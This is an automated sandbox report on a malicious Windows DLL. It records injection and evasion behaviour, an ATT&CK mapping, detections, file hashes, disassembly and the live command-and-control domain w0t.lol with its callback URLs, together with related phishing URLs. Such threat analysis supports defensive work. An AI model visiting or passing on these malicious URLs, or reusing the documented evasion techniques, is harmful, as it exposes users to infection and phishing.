Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe | Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec) | graph_3-1949
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_3_06982A81 FindFirstFileW | 3_3_06982A81
Source: rundll32.exe, 00000003.00000002.84973750078.00000000033B7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.84857412676.00000000033B7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.84973505391.0000000003352000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: rundll32.exe, 00000003.00000002.84973505391.0000000003352000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWJ
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_03290005 VirtualAlloc,LoadLibraryA,LdrGetProcedureAddress,VirtualProtect | 3_2_03290005
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_0040C340 mov eax, dword ptr fs:[00000030h] | 0_2_0040C340
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_03290391 mov eax, dword ptr fs:[00000030h] | 3_2_03290391
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_27AC1120 mov ebx, dword ptr fs:[00000030h] | 3_2_27AC1120

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\SysWOW64\rundll32.exe | Network Connect: 104.21.69.9 443
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\e.dll",#1
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_00401090 cpuid | 0_2_00401090
Source: C:\Windows\SysWOW64\rundll32.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
MITRE ATT&CK matrix (the number in parentheses is the count of matching signatures for that technique):

Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | Windows Management Instrumentation | DLL Side-Loading (1) | Process Injection (111) | Virtualization/Sandbox Evasion (1) | OS Credential Dumping | Security Software Discovery (11) | Remote Services | Archive Collected Data (1) | Encrypted Channel (21) | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | DLL Side-Loading (1) | Process Injection (111) | LSASS Memory | Virtualization/Sandbox Evasion (1) | Remote Desktop Protocol | Data from Removable Media | Ingress Tool Transfer (4) | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | Obfuscated Files or Information (1) | Security Account Manager | File and Directory Discovery (1) | SMB/Windows Admin Shares | Data from Network Shared Drive | Non-Application Layer Protocol (3) | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | Rundll32 (1) | NTDS | System Information Discovery (13) | Distributed Component Object Model | Input Capture | Application Layer Protocol (14) | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | Software Packing (1) | LSA Secrets | Internet Connection Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | DLL Side-Loading (1) | Cached Domain Credentials | Wi-Fi Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
Source | Detection | Scanner | Label
e.dll | 100% | Avira | HEUR/AGEN.1300770
e.dll | 100% | Joe Sandbox ML |
No Antivirus matches
Name | IP | Active | Malicious | Antivirus Detection | Reputation
w0t.lol | 104.21.69.9 | true | true | | unknown

Name | Malicious | Antivirus Detection | Reputation
https://w0t.lol/S2wueuBWcKItxJBxaKQWGAqL7hMS3sfSm3IIJcJI-UnDuhqZF3FZYmhcdfYjgTH9ls8toERqLL6uvqWxks5TXG7p4KTZE3NtE0QUExXonRRsVxuWAUUUBfY4OBn0j6WOD9WysDP09mb9Mw2zw25E4216qfUiBb1_-f0hXmBwm-5V3zs05mClVySIs4Q2owQXkeB3urgLrouGFuJF9ZudjP54bzXceldzNx2o8pCLFM6WK1vNqyQJ4ZGEs5wabg119exWDBy_U0fDfIKkmquk4nx095rTVG61p-61BBPfkxzOTkQYmZHX6uOiApQ41hZ0OE5yH5VhrRws_4Dk7blD-zRqQGci0UruB3OYd7fIEanuxbGDB6PoPMh8nJxhyUjELjSu3EwICQdnYkBbiVs2LkVCWKmmn2lIaQTzB-OoNpw-dg1CW7D5qiS6SoaepRg | true | | unknown

Name | Source | Malicious | Antivirus Detection | Reputation
https://w0t.lol/S2wueuBWcKItxJBxaKQWGAqL7hMS3sfSm3IIJcJI-UnDuhqZF3FZYmhcdfYjgTH9ls8toERqLL6uvqWxks5T | rundll32.exe, 00000003.00000002.84973505391.0000000003352000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.84973703050.000000000339D000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://www.quovadis.bm0 | rundll32.exe, 00000003.00000002.84973852233.00000000033CE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.84857080785.00000000033CE000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://w0t.lol/ | rundll32.exe, 00000003.00000003.84857294274.000000000339C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.84973703050.000000000339D000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://ocsp.quovadisoffshore.com0 | rundll32.exe, 00000003.00000002.84973852233.00000000033CE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.84857080785.00000000033CE000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://w0t.lol/v | rundll32.exe, 00000003.00000003.84857294274.000000000339C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.84973703050.000000000339D000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://w0t.lol/T | rundll32.exe, 00000003.00000002.84973703050.000000000339D000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
104.21.69.9 | w0t.lol | United States | 13335 | CLOUDFLARENETUS | true
                  Joe Sandbox version:41.0.0 Charoite
                  Analysis ID:1523389
                  Start date and time:2024-10-01 15:10:35 +02:00
                  Joe Sandbox product:CloudBasic
                  Overall analysis duration:0h 13m 18s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Cookbook file name:default.jbs
Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301)
                  Run name:Suspected Instruction Hammering
Number of new started processes analysed:5
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Sample name:e.dll
                  Detection:MAL
                  Classification:mal72.bank.evad.winDLL@6/0@1/1
                  EGA Information:
                  • Successful, ratio: 100%
                  HCA Information:
                  • Successful, ratio: 88%
                  • Number of executed functions: 72
                  • Number of non-executed functions: 26
                  Cookbook Comments:
                  • Found application associated with file extension: .dll
                  • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                  • Exclude process from analysis (whitelisted): dllhost.exe
• Not all processes were analyzed, report is missing behavior information
                  • Report size exceeded maximum capacity and may have missing disassembly code.
                  • Report size getting too big, too many NtEnumerateKey calls found.
                  • Report size getting too big, too many NtOpenKeyEx calls found.
                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                  • Report size getting too big, too many NtQueryValueKey calls found.
                  • VT rate limit hit for: e.dll
                  No simulations
                  No context
                  No context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
CLOUDFLARENETUS | Sales_Contract_Main_417053608_09.2024.pdf | malicious | Unknown | 188.114.97.3
| https://pt9w4x.nauleacepr.com/9QLzRhIr/#Ygovernment.relations@rolls-royce.com | malicious | HTMLPhisher | 104.18.86.42
| https://vwkugoia0yciq0buttompanj2.ntvultra.com/viciorhthvgh/forhwural/coupletri/QdhahVchT/yEjbKM/anNhbGFzQGhvbGxhbmRjby5jb20= | malicious | HTMLPhisher | 104.17.25.14
| Sales_Contract_Main_417053608_09.2024.pdf | malicious | Unknown | 104.18.95.41
| hbwebdownload - MT 103.exe | malicious | FormBook | 188.114.96.3
| hesaphareketi-01.bat.exe | malicious | Snake Keylogger, VIP Keylogger | 188.114.97.3
| https://links.rasa.io/v1/t/eJx1kM2OgjAUhV_FsB6kpUXQ1bzAuJp9c2mvTI1Q0tvGEMO7DzCKC51t73d-em5J9JfksEl-QujpkGXR19A13sUet9q1W4iZJko-NkmLAQwEmOhbQi56jbPwiFe6YAjoXyBswS7mBiwN2nVXGCSTn838PrvPCg8EqkUiaFCFoV9Na2_x9I0Uvv6OK0yxPqMO6tlhsmpjZ8OgppCTbaKHYF33IFflk7Nm1u3LUgDjp5QXRqZ1qU0KOYNUij0T1U7ntaxeOhJ2Rk1_XJJzlsuUs5TxlfOonTf3BF5UohBl9aZCj56mjv9wjzQfV0TIXck5E_I9RBTxjh5dt8wFtQrTgMr18xzrZRzHX-Cephc=#a2FyZW4ubW9vbmV5QGJhbGxhcmRkZXNpZ25zLm5ldA== | malicious | HTMLPhisher | 104.17.25.14
| Message_2477367.eml | malicious | Unknown | 1.1.1.1
| file.exe | malicious | CredGrabber, Meduza Stealer | 104.26.13.205
| Swift_ach Complaints.sppgCQDM.html | malicious | HTMLPhisher | 104.18.11.207
Match | Associated Sample Name / URL | Detection | Threat Name | Context
37f463bf4616ecd445d4a1937da06e19 | file.exe | malicious | CredGrabber, Meduza Stealer | 104.21.69.9
| Passport.vbs | malicious | Unknown | 104.21.69.9
| Ajánlatkérés 09-30-2024·pdf.vbs | malicious | GuLoader, Lokibot | 104.21.69.9
| 18000012550_20240930_0078864246·pdf.vbs | malicious | Remcos, GuLoader | 104.21.69.9
| PRORAČUNSKA ZAHTEVA 09-30-2024·pdf.vbe | malicious | GuLoader, Lokibot | 104.21.69.9
| A 413736796·pdf.vbs | malicious | Remcos, GuLoader | 104.21.69.9
| Solicitud de presupuesto 09-30-2024·pdf.vbs | malicious | GuLoader, Lokibot | 104.21.69.9
| SOLICITUD DE PEDIDO (Universidade de São Paulo (USP))09-30-2024·pdf.vbs | malicious | GuLoader, Lokibot | 104.21.69.9
| Recibo de transferencia·pdf.vbs | malicious | Remcos, GuLoader | 104.21.69.9
| 6JA2YPtbeB.exe | malicious | LummaC, Stealc, Vidar | 104.21.69.9
                  No context
                  No created / dropped files found
                  File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                  Entropy (8bit):7.857208389757357
                  TrID:
                  • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
                  • Generic Win/DOS Executable (2004/3) 0.20%
                  • DOS Executable Generic (2002/1) 0.20%
                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                  File name:e.dll
                  File size:2'228'224 bytes
                  MD5:972d3e17b96745be89b80ec5d8f4f9d3
                  SHA1:e97c6461bbdcd91566f4cb75b456e399b7fe06c2
                  SHA256:b116511e3960ab5fa53ad6a3243240be11235ebdc323705827713cf12a9aeeda
                  SHA512:060b6a99fae4af1d869cd23b84ab2b18d69eeba5ff60ac1355e605e5ecfe049b41fb52dc5989cdac90572133389673cc48fe366494bcb01de278bf93a247982a
                  SSDEEP:49152:kwNgYx8UccgdkvUADkwkxSnTyCbJux8OwyvW:kwBVcNgUyZbnTytPTW
                  TLSH:90A502BDB064C781D64B397F7E0A332DB53A17805187AD26E51778AE70236EC11B42BB
                  File Content Preview:MZ......................@............................................q...q...q..0/...q..u*...q...,...q.......q..u*...q....V..q.......q..M....q..Rich.q..............PE..L...q3.f...........!......... !.....P.............@..........................."........
                  Icon Hash:0f372331d982ca5a
                  Entrypoint:0x401450
                  Entrypoint Section:.text
                  Digitally signed:false
                  Imagebase:0x400000
                  Subsystem:windows gui
                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL
                  DLL Characteristics:TERMINAL_SERVER_AWARE
                  Time Stamp:0x66F43371 [Wed Sep 25 15:59:45 2024 UTC]
                  TLS Callbacks:
                  CLR (.Net) Version:
                  OS Version Major:5
                  OS Version Minor:0
                  File Version Major:5
                  File Version Minor:0
                  Subsystem Version Major:5
                  Subsystem Version Minor:0
                  Import Hash:abe607481ac2953967a12ac99e7e578f
                  Instruction
                  inc edx
                  inc edx
                  inc eax
                  add dword ptr [00433320h], esp
                  inc eax
                  dec eax
                  inc edx
                  dec eax
                  jmp 00007F5C4490523Fh
                  dec eax
                  mov eax, esi
                  push eax
                  pop dword ptr [00433310h]
                  xor edx, 0Ah
                  inc edx
                  mov eax, edx
                  xor dword ptr [00433318h], ebx
                  mov eax, edi
                  push eax
                  pop dword ptr [00433314h]
                  mov dword ptr [0043331Ch], ebp
                  lea eax, dword ptr [00401210h]
                  call eax
                  jmp 00007F5C449051E3h
                  xor edx, 5Fh
                  xor edx, 5Fh
                  xor edx, 5Fh
                  xor edx, 5Fh
                  xor edx, 5Fh
                  xor edx, 5Fh
                  xor edx, 5Fh
                  xor edx, 5Fh
                  xor edx, 5Fh
                  xor edx, 5Fh
                  xor edx, 5Fh
                  xor edx, 5Fh
                  xor edx, 5Fh
                  xor edx, 5Fh
                  xor edx, 5Fh
                  xor edx, 5Fh
                  xor edx, 5Fh
                  xor edx, 5Fh
                  xor edx, 5Fh
                  xor edx, 5Fh
                  xor edx, 5Fh
                  xor edx, 5Fh
                  xor edx, 5Fh
                  xor edx, 5Fh
                  xor edx, 5Fh
                  xor edx, 5Fh
                  xor edx, 5Fh
                  xor edx, 5Fh
                  xor edx, 5Fh
                  xor edx, 5Fh
                  xor edx, 5Fh
                  xor edx, 5Fh
                  mov dword ptr [ebp+00h], eax
                  nop
                  nop
                  nop
                  nop
                  nop
                  nop
                  nop
                  nop
                  nop
                  nop
                  nop
                  nop
                  nop
                  nop
                  nop
                  push ebp
                  mov ebp, esp
                  push eax
                  mov eax, 00000001h
                  mov dword ptr [ebp-04h], 00000000h
                  add esp, 04h
                  pop ebp
                  ret
                  nop
                  nop
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xf694 | 0x50 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x20f000 | 0x6d28 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x216000 | 0x9a4c | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0xf030 | 0x1c | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0xf000 | 0x30 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0xc910 | 0xd000 | d8c6c2ce2710e51965ec969f1e605308 | False | 0.09927133413461539 | data | 1.5511921998856308 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.crt1 | 0xe000 | 0x4e | 0x1000 | 029ebcb0413d7a466159aef461509fff | False | 0.025634765625 | data | 0.19194904064040105 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
